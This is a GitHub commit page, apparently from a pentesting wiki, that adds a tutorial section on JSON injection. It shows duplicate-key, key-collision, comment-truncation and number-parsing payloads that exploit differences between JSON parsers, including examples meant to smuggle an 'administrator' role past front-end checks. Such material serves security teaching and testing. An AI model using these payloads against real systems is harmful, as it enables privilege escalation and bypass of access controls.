Skip to content

Commit

Permalink
GITBOOK-4429: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
carlospolop authored and gitbook-bot committed Nov 12, 2024
1 parent 2a67d6a commit 42b2b7e
Show file tree
Hide file tree
Showing 2 changed files with 105 additions and 2 deletions.
2 changes: 1 addition & 1 deletion SUMMARY.md
Original file line number Diff line number Diff line change
Expand Up @@ -604,7 +604,7 @@
* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
* [Open Redirect](pentesting-web/open-redirect.md)
* [ORM Injection](pentesting-web/orm-injection.md)
* [Parameter Pollution](pentesting-web/parameter-pollution.md)
* [Parameter Pollution | JSON Injection](pentesting-web/parameter-pollution.md)
* [Phone Number Injections](pentesting-web/phone-number-injections.md)
* [PostMessage Vulnerabilities](pentesting-web/postmessage-vulnerabilities/README.md)
* [Blocking main page to steal postmessage](pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md)
Expand Down
105 changes: 104 additions & 1 deletion pentesting-web/parameter-pollution.md
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# Parameter Pollution
# Parameter Pollution | JSON Injection

## Parameter Pollution

Expand Down Expand Up @@ -136,11 +136,114 @@ There results were taken from [https://medium.com/@0xAwali/http-parameter-pollut
1. NOT Recognized name\[] .
2. Prefer the last parameter .

## JSON Injection

### Duplicate keys

```ini
obj = {"test": "user", "test": "admin"}
```

The front-end might believe the first ocurrence while the backend uses the second ocurrence of the key.

### Key Collision: Character Truncation and Comments

Certain characters aren't going to be correctly interpreted by the frontend but the backend will interpret them and use those keys, this could be useful to **bypass certain restrictions**:

```json
{"test": 1, "test\[raw \x0d byte]": 2}
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}
```

Note how in these cases the front end might think that `test == 1` and the backend will think that `test == 2`.

This can also by used to bypass value restrictions like:

```json
{"role": "administrator\[raw \x0d byte]"}
{"role":"administrator\ud800"}
{"role": "administrator""}
{"role": "admini\strator"}
```

### **Using Comment Truncation**

{% code overflow="wrap" %}
```ini
obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}
```
{% endcode %}

Here we will use the serializer from each parser to view its respective output.

Serializer 1 (e.g., GoLang's GoJay library) will produce:

* `description = "Duplicate with comments"`
* `test = 2`
* `extra = ""`

Serializer 2 (e.g., Java's JSON-iterator library) will produce:

* `description = "Duplicate with comments"`
* `extra = "/*"`
* `extra2 = "*/"`
* `test = 1`

Alternatively, straightforward use of comments can also be effective:

```ini
obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}
```

Java’s GSON library:

```json
{"description":"Comment support","test":1,"extra":"a"}
```

Ruby’s simdjson library:

```json
{"description":"Comment support","test":2,"extra":"a","extra2":"b"}
```

### **Inconsistent Precedence: Deserialization vs. Serialization**

```ini
obj = {"test": 1, "test": 2}

obj["test"] // 1
obj.toString() // {"test": 2}
```

### Float and Integer

The number

```undefined
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
```

can be decoded to multiple representations, including:

```undefined
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807
```

Which might create inconsistences

## References

* [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
* [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
* [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
* [https://bishopfox.com/blog/json-interoperability-vulnerabilities](https://bishopfox.com/blog/json-interoperability-vulnerabilities)

<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>

Expand Down

0 comments on commit 42b2b7e

Please sign in to comment.